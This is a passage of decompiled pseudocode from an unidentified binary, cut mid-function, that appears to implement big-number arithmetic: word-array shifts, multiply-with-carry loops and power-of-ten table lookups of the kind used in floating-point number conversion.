									_t790 = L004023A0(_t789, _t1058, _t1080, _t1143);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1189;
									_v464 = _t1189;
									_t1061 = (0 | _t1189 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1240;
									if(_t1240 < 0) {
										__eflags = _t1240 - 0xfffffc02;
										if(_t1240 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1258 = _t1109;
														_t1216 =  &_v468 + _t1109 * 4;
														_v1880 = _t1216;
														while(1) {
															__eflags = _t1258 - _t1061;
															if(_t1258 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1216;
															}
															_t210 = _t1258 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1168 = 0;
																__eflags = 0;
															} else {
																_t1168 =  *(_t1216 - 4);
															}
															_t1216 = _t1216 - 4;
															_t972 = _v1880;
															_t1258 = _t1258 - 1;
															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1258 - 0xffffffff;
															if(_t1258 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1240 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1192 = 1 - _t1240;
											E003EFFF0(_t1192,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1172 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
														goto L101;
													}
													_t1172 = _t1172 + 4;
													__eflags = _t1172 - 8;
													if(_t1172 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1173 = 0;
															__eflags = 0;
														} else {
															_t1173 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1259 = _t1110;
														__eflags = _t975 - _t1173 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1217 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1173 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1259 - _t1061;
															if(_t1259 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1217;
															}
															_t175 = _t1259 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1174 = 0;
																__eflags = 0;
															} else {
																_t1174 =  *(_t1217 - 4);
															}
															_t1217 = _t1217 - 4;
															_t981 = _v1880;
															_t1259 = _t1259 - 1;
															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1259 - 0xffffffff;
															if(_t1259 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1219 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1261 = _t1219 << 2;
														E003EFFF0(_t1219,  &_v1396, 0, _t1261);
														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1219 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E003FBDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1277 =  &(_t1274[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1262 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1262;
										__eflags = _t1061 - _t1262;
										if(_t1061 != _t1262) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1221 = _t992 >> 5;
											_v1872 = _t1221;
											_v1908 = _t1114 - _t993;
											_t996 = E003EF0C0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1179 = _t1061 + _t1221;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1179;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1179 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
											__eflags = _t1179 - 0x73;
											if(_t1179 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1179 - _t1119;
													if(_t1179 >= _t1119) {
														_t1179 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1179;
													_v1880 = _t1012;
													__eflags = _t1179 - 0xffffffff;
													if(_t1179 != 0xffffffff) {
														_t1180 = _v1872;
														_t1264 = _t1179 - _t1180;
														__eflags = _t1264;
														_t1123 =  &_v468 + _t1264 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1180;
															if(_t1012 < _t1180) {
																break;
															}
															__eflags = _t1264 - _t1061;
															if(_t1264 >= _t1061) {
																_t1224 = 0;
																__eflags = 0;
															} else {
																_t1224 =  *_t1123;
															}
															__eflags = _t1264 - 1 - _t1061;
															if(_t1264 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1264 = _t1264 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1179 = _v1892;
														_t1221 = _v1872;
														_t1262 = 2;
													}
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1221 << 2);
														_t1274 =  &(_t1274[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1179;
													} else {
														_v472 = _t1179 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1262;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1266 = _t1023 >> 5;
													_v1876 = _t1266;
													_v1908 = _t1129;
													_t1027 = E003EF0C0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1182 = _t1266 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1182;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1182 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
													__eflags = _t1182 - 0x73;
													if(_t1182 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
														_t1274 =  &(_t1274[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1182 - _t1134;
															if(_t1182 >= _t1134) {
																_t1182 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1182;
															_v1892 = _t1135;
															__eflags = _t1182 - 0xffffffff;
															if(_t1182 != 0xffffffff) {
																_t1183 = _v1876;
																_t1268 = _t1182 - _t1183;
																__eflags = _t1268;
																_t1043 =  &_v468 + _t1268 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1183;
																	if(_t1135 < _t1183) {
																		break;
																	}
																	__eflags = _t1268 - _t1061;
																	if(_t1268 >= _t1061) {
																		_t1230 = 0;
																		__eflags = 0;
																	} else {
																		_t1230 =  *_t1043;
																	}
																	__eflags = _t1268 - 1 - _t1061;
																	if(_t1268 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1268 = _t1268 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1182 = _v1880;
																_t1266 = _v1876;
															}
															__eflags = _t1266;
															if(_t1266 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1266 << 2);
																_t1274 =  &(_t1274[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1182;
															} else {
																_v472 = _t1182 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E003FBDE1();
										_t1277 =  &(_t1274[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0x4083dc + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1199 = 0;
															_t1248 = 0;
															__eflags = 0;
															do {
																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1248 = _t1248 + 1;
																_t1199 = _t1153;
																__eflags = _t1248 - _t1096;
															} while (_t1248 != _t1096);
															__eflags = _t1199;
															if(_t1199 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0x408346 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0x408346 + _t812 * 4) & 0x000000ff) + ( *(0x408347 + _t812 * 4) & 0x000000ff);
												E003EFFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E003F0320( &(( &_v1396)[_t1097]), 0x407a40 + ( *(0x408344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x408347 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1202 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1154 =  &_v468;
														} else {
															_t1202 =  &_v468;
															_t1154 =  &_v1396;
														}
														_v1908 = _t1154;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1155 = 0;
														_t1250 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1155;
															_t870 = _t1155 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1203 = _t1202 -  &_v1860;
															__eflags = _t1203;
															_v1928 = _t1203;
															do {
																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1204 = 0;
																	_t1099 = _t1250;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1203 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1155;
																			if(_t1099 == _t1155) {
																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1250;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1204 = _t886 * _v1896 >> 0x20;
																			_t1155 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1204;
																				if(_t1204 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1155;
																					if(_t1099 == _t1155) {
																						_t558 = _t1271 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1204;
																					_t1204 = 0;
																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
																					_t1155 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1250 - _t1155;
																	if(_t1250 == _t1155) {
																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
																		_t526 = _t1250 + 1; // 0x1
																		_t1155 = _t526;
																		_v1864 = _t1155;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1250 = _t1250 + 1;
																__eflags = _t1250 - _t1098;
															} while (_t1250 != _t1098);
															goto L243;
														}
													} else {
														_t1205 = _v468;
														_v472 = _t1098;
														E003FBDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1205;
														if(_t1205 == 0) {
															goto L203;
														} else {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1251 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1205;
																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1251 = _t1251 + 1;
																		_t1100 = _t1156;
																		__eflags = _t1251 - _v1896;
																	} while (_t1251 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1206 = _v1396;
													__eflags = _t1206;
													if(_t1206 != 0) {
														__eflags = _t1206 - 1;
														if(_t1206 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1252 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1206;
																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1252 = _t1252 + 1;
																	_t1101 = _t1157;
																	__eflags = _t1252 - _v1896;
																} while (_t1252 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E003FBDE1( &_v468, _t1064,  &_v2404, 0);
																		_t1277 =  &(_t1277[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E003FBDE1();
														_t1277 =  &(_t1277[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1207 =  *(0x4083dc + _t1102 * 4);
												__eflags = _t1207;
												if(_t1207 != 0) {
													__eflags = _t1207 - 1;
													if(_t1207 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1253 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1207;
																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1253 = _t1161;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1253;
															if(_t1253 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0x408346 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0x408346 + _t908 * 4) & 0x000000ff) + ( *(0x408347 + _t908 * 4) & 0x000000ff);
												E003EFFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E003F0320( &(( &_v1396)[_t1104]), 0x407a40 + ( *(0x408344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x408347 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1210 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1162 =  &_v932;
														} else {
															_t1210 =  &_v932;
															_t1162 =  &_v1396;
														}
														_v1876 = _t1162;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1163 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1163;
															_t929 = _t1163 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1211 = _t1210 -  &_v1860;
															__eflags = _t1211;
															_v1928 = _t1211;
															do {
																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1212 = 0;
																	_t1106 = _t1255;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1211 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1163;
																			if(_t1106 == _t1163) {
																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1255;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1212 = _t945 * _v1884 >> 0x20;
																			_t1163 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1212;
																				if(_t1212 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1163;
																					if(_t1106 == _t1163) {
																						_t370 = _t1271 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1212;
																					_t1212 = 0;
																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
																					_t1163 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1255 - _t1163;
																	if(_t1255 == _t1163) {
																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
																		_t338 = _t1255 + 1; // 0x1
																		_t1163 = _t338;
																		_v1864 = _t1163;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1105;
															} while (_t1255 != _t1105);
															goto L177;
														}
													} else {
														_t1213 = _v932;
														_v936 = _t1105;
														E003FBDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1213;
														if(_t1213 != 0) {
															__eflags = _t1213 - 1;
															if(_t1213 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1213;
																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1107 = _t1164;
																		__eflags = _t1256 - _v1884;
																	} while (_t1256 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1214 = _v1396;
													__eflags = _t1214;
